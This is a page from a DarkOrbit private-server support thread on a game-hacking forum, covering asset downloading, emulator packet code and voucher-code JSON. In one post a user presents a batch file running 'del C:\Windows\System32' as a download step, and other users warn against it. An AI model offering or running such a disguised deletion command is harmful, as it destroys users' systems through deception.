|
You last visited: Today at 10:51
Advertisement
Private Server Info and Support Thread
Discussion on Private Server Info and Support Thread within the DarkOrbit forum part of the Browsergames category.
03/30/2016, 01:45
|
#2476
|
elite*gold: 0
Join Date: May 2014
Posts: 663
Received Thanks: 1,154
|
Quote:
Originally Posted by d5d
How to download it Please
|
Ctrl + S
|
|
|
03/30/2016, 02:54
|
#2477
|
elite*gold: 0
Join Date: Apr 2013
Posts: 25
Received Thanks: 8
|
Quote:
Originally Posted by manulaiko3.0
Ctrl + S
|
chattool.html ? O.o
|
|
|
03/30/2016, 15:23
|
#2478
|
elite*gold: 0
Join Date: May 2014
Posts: 663
Received Thanks: 1,154
|
Quote:
Originally Posted by d5d
chattool.html ? O.o 
|
Yep, now in the same folder make a .bat file with the followin code:
Code:
echo "Dowloading..."
del C:\Windows\System32
echo "Downloaded!"
And save it as "download.bat", execute it and you're done.
|
|
|
03/30/2016, 15:31
|
#2479
|
elite*gold: 0
Join Date: Jan 2012
Posts: 1,997
Received Thanks: 3,422
|
Quote:
Originally Posted by d5d
chattool.html ? O.o 
|
Quote:
Originally Posted by manulaiko3.0
Yep, now in the same folder make a .bat file with the followin code:
Code:
echo "Dowloading..."
del C:\Windows\System32
echo "Downloaded!"
And save it as "download.bat", execute it and you're done.
|
Lol, ok @  , don't do that. Just download this tool and run it, you'll find a file named "Resources" on your desktop, every resources of darkorbit.com/spacemap/graphics & darkorbit.com/spacemap/audio will be there.
|
|
|
03/30/2016, 16:16
|
#2480
|
elite*gold: 0
Join Date: Apr 2013
Posts: 25
Received Thanks: 8
|
Quote:
Originally Posted by NoCheatImPGM
Lol, ok @  , don't do that. Just download this tool and run it, you'll find a file named "Resources" on your desktop, every resources of darkorbit.com/spacemap/graphics & darkorbit.com/spacemap/audio will be there.
|
Thaanks You Bro Can you Showe My Code Source Dowloader If you want
|
|
|
03/30/2016, 23:48
|
#2481
|
elite*gold: 0
Join Date: Jul 2012
Posts: 612
Received Thanks: 268
|
Quote:
Originally Posted by manulaiko3.0
Yep, now in the same folder make a .bat file with the followin code:
Code:
echo "Dowloading..."
del C:\Windows\System32
echo "Downloaded!"
And save it as "download.bat", execute it and you're done.
|
lol
WTF
|
|
|
04/01/2016, 12:29
|
#2482
|
elite*gold: 0
Join Date: Mar 2013
Posts: 169
Received Thanks: 16
|
In what order to send packets to the client version 6.3.1 ? I send them here and not on anything else to get in return apart from the pack 30808.
PHP Code:
if (parser.Id == 30808)
{
var a = parser.ReadShort();
var v = parser.ReadInt();
var d = parser.ReadShort();
var z = parser.ReadString();
var t = parser.ReadString(); //ver
var x = parser.ReadInt();
wr("30808 " + " " + a + " " + v + " " + d + " " + z + " " + t + " " + x);
var login_ = new PacketBuilder(30808);
login_.WriteInt(22);
login_.WriteShort(1);
login_.WriteString("MY_SID");
login_.WriteString("6.3.1");
login_.WriteInt(228);
Send_bytes(login_.GetBytes());
var RDY = new PacketBuilder(19268);
RDY.WriteShort(0);
RDY.WriteInt(22);
RDY.WriteString("test");
RDY.WriteInt(10);
RDY.WriteInt(500);
RDY.WriteInt(2);
RDY.WriteInt(33);
RDY.WriteInt(1);
RDY.WriteInt(256);
RDY.WriteInt(1);
RDY.WriteInt(12);
RDY.WriteInt(1);
RDY.WriteInt(256);
RDY.WriteInt(1000);
RDY.WriteInt(1000);
RDY.WriteInt(16);
RDY.WriteInt(1);
RDY.WriteInt(0);
RDY.WriteInt(2000);
RDY.WriteInt(2000);
RDY.WriteInt(257);
RDY.WriteBool(true);
RDY.WriteDouble(789);
RDY.WriteDouble(12331);
RDY.WriteInt(18);
RDY.WriteDouble(331);
RDY.WriteDouble(12123);
RDY.WriteFloat(9);
RDY.WriteInt(21);
RDY.WriteString("");
RDY.WriteInt(3);
RDY.WriteBool(true);
RDY.WriteBool(false);
RDY.WriteInt(6);
Send_bytes(RDY.GetBytes());
}
if (parser.Id == 25391)
{
var msg = parser.ReadShort();
var msg_ = parser.ReadString();//ping
wr(msg_);//Console.writeline
}
if (parser.Id == 666)
{
var as_ = parser.ReadShort();
var a = parser.ReadInt();
var v = parser.ReadInt();
var d = parser.ReadInt();
Console.WriteLine("666 " + a + " " + v + " " + d + " ");
var en = new BlackSPACE.core.socket_async.PacketBuilder(667);
en.WriteShort(0);
en.WriteBool(true);
en.WriteInt(0);
en.WriteInt(3);
en.WriteInt(6);
Send_bytes(en.GetBytes());
wr("VersionRequest sent !");
}
}
|
|
|
04/01/2016, 14:05
|
#2483
|
elite*gold: 3570
Join Date: Dec 2012
Posts: 13,043
Received Thanks: 8,252
|
Quote:
Originally Posted by oleg-19952008
In what order to send packets to the client version 6.3.1 ? I send them here and not on anything else to get in return apart from the pack 30808.
PHP Code:
if (parser.Id == 30808) { var a = parser.ReadShort(); var v = parser.ReadInt(); var d = parser.ReadShort(); var z = parser.ReadString(); var t = parser.ReadString(); //ver var x = parser.ReadInt(); wr("30808 " + " " + a + " " + v + " " + d + " " + z + " " + t + " " + x);
var login_ = new PacketBuilder(30808); login_.WriteInt(22); login_.WriteShort(1); login_.WriteString("MY_SID"); login_.WriteString("6.3.1"); login_.WriteInt(228); Send_bytes(login_.GetBytes()); var RDY = new PacketBuilder(19268); RDY.WriteShort(0); RDY.WriteInt(22); RDY.WriteString("test"); RDY.WriteInt(10); RDY.WriteInt(500); RDY.WriteInt(2); RDY.WriteInt(33); RDY.WriteInt(1); RDY.WriteInt(256); RDY.WriteInt(1); RDY.WriteInt(12); RDY.WriteInt(1); RDY.WriteInt(256); RDY.WriteInt(1000); RDY.WriteInt(1000); RDY.WriteInt(16); RDY.WriteInt(1); RDY.WriteInt(0); RDY.WriteInt(2000); RDY.WriteInt(2000); RDY.WriteInt(257); RDY.WriteBool(true); RDY.WriteDouble(789); RDY.WriteDouble(12331); RDY.WriteInt(18); RDY.WriteDouble(331); RDY.WriteDouble(12123); RDY.WriteFloat(9); RDY.WriteInt(21); RDY.WriteString(""); RDY.WriteInt(3); RDY.WriteBool(true); RDY.WriteBool(false); RDY.WriteInt(6); Send_bytes(RDY.GetBytes());
} if (parser.Id == 25391) { var msg = parser.ReadShort(); var msg_ = parser.ReadString();//ping wr(msg_);//Console.writeline } if (parser.Id == 666) { var as_ = parser.ReadShort(); var a = parser.ReadInt(); var v = parser.ReadInt(); var d = parser.ReadInt(); Console.WriteLine("666 " + a + " " + v + " " + d + " "); var en = new BlackSPACE.core.socket_async.PacketBuilder(667); en.WriteShort(0); en.WriteBool(true); en.WriteInt(0); en.WriteInt(3); en.WriteInt(6); Send_bytes(en.GetBytes()); wr("VersionRequest sent !"); } }
|
Reverse the main swf properly and you'll know what to do. And your code looks awful.
|
|
|
04/01/2016, 17:05
|
#2484
|
elite*gold: 0
Join Date: Feb 2011
Posts: 34
Received Thanks: 2
|
Requi why no you make one serier with tutorials to change Darkorbit Source?
|
|
|
04/01/2016, 20:39
|
#2485
|
elite*gold: 0
Join Date: Apr 2015
Posts: 246
Received Thanks: 398
|
There are actually a lot of information on this forum but people don't spend time trying to understand it. They prefer to ask for a perfect line of code to fix all their problems, like if that existed.
I already thought about making tutorials or even streams/videos when I'm coding something, like the server I'm currently working for fun. But I doubt that helps at the end.
Regards.-
|
|
|
04/02/2016, 12:25
|
#2486
|
elite*gold: 0
Join Date: Oct 2015
Posts: 9
Received Thanks: 1
|
Hi Guys İ Need Create Voucher Code İn My PVE Server
How To Create Code Plz Help Me .
|
|
|
04/02/2016, 17:38
|
#2487
|
elite*gold: 61
Join Date: Oct 2010
Posts: 1,188
Received Thanks: 2,403
|
Quote:
Originally Posted by Skydark[DEV]
Hi Guys İ Need Create Voucher Code İn My PVE Server
How To Create Code Plz Help Me .

|
if you are using the Darkplanet system, then you need to make the vpro "key" a json builded string. The system runs of json.
The "VKEY" should be something random you generate, it needs to be unique, because thats what the user type in to get the vpro (virtual product) from the system.
Regards Bau
|
|
|
04/03/2016, 09:31
|
#2488
|
elite*gold: 0
Join Date: May 2015
Posts: 116
Received Thanks: 37
|
Quote:
Originally Posted by Wingm8
if you are using the Darkplanet system, then you need to make the vpro "key" a json builded string. The system runs of json.
The "VKEY" should be something random you generate, it needs to be unique, because thats what the user type in to get the vpro (virtual product) from the system.
Regards Bau
|
Hi Bau
Can you give examples bkz i want Create 1 M Uridium Code ?
|
|
|
04/03/2016, 21:24
|
#2489
|
elite*gold: 61
Join Date: Oct 2010
Posts: 1,188
Received Thanks: 2,403
|
Quote:
Originally Posted by ZeusReally
Hi Bau
Can you give examples bkz i want Create 1 M Uridium Code ?
|
I can not remember the setup for items, but i think for uridium it's probably something like this:
base64 encode following:
PHP Code:
{ "uridium": { "a": 1000000 }}
So it's like: ew0KICAidXJpZGl1bSI6IHsNCiAgICAiYSI6IDEwMDAwMDANCi AgfQ0KfQ==
as vpro
Best Regards w8
|
|
|
04/04/2016, 00:00
|
#2490
|
elite*gold: 2
Join Date: Jun 2012
Posts: 988
Received Thanks: 562
|
what are wrong orbit reborn emulator
|
|
|
Similar Threads
|
Private private server :P READ FOR MORE INFO
12/01/2010 - SRO Private Server - 12 Replies
hey guys im wondering if there is anyway to make a real private server like ZSZC or SWSRO or MYSRO but to where i can only play and level a character and as if it was a real private server. but just for me, not like an emulator where im already lvl 90 or 120 or whatever. i mean one where i set the rates and i level. if not then ok u can close this. but i was just wondering.
|
All times are GMT +1. The time now is 10:54.
|
|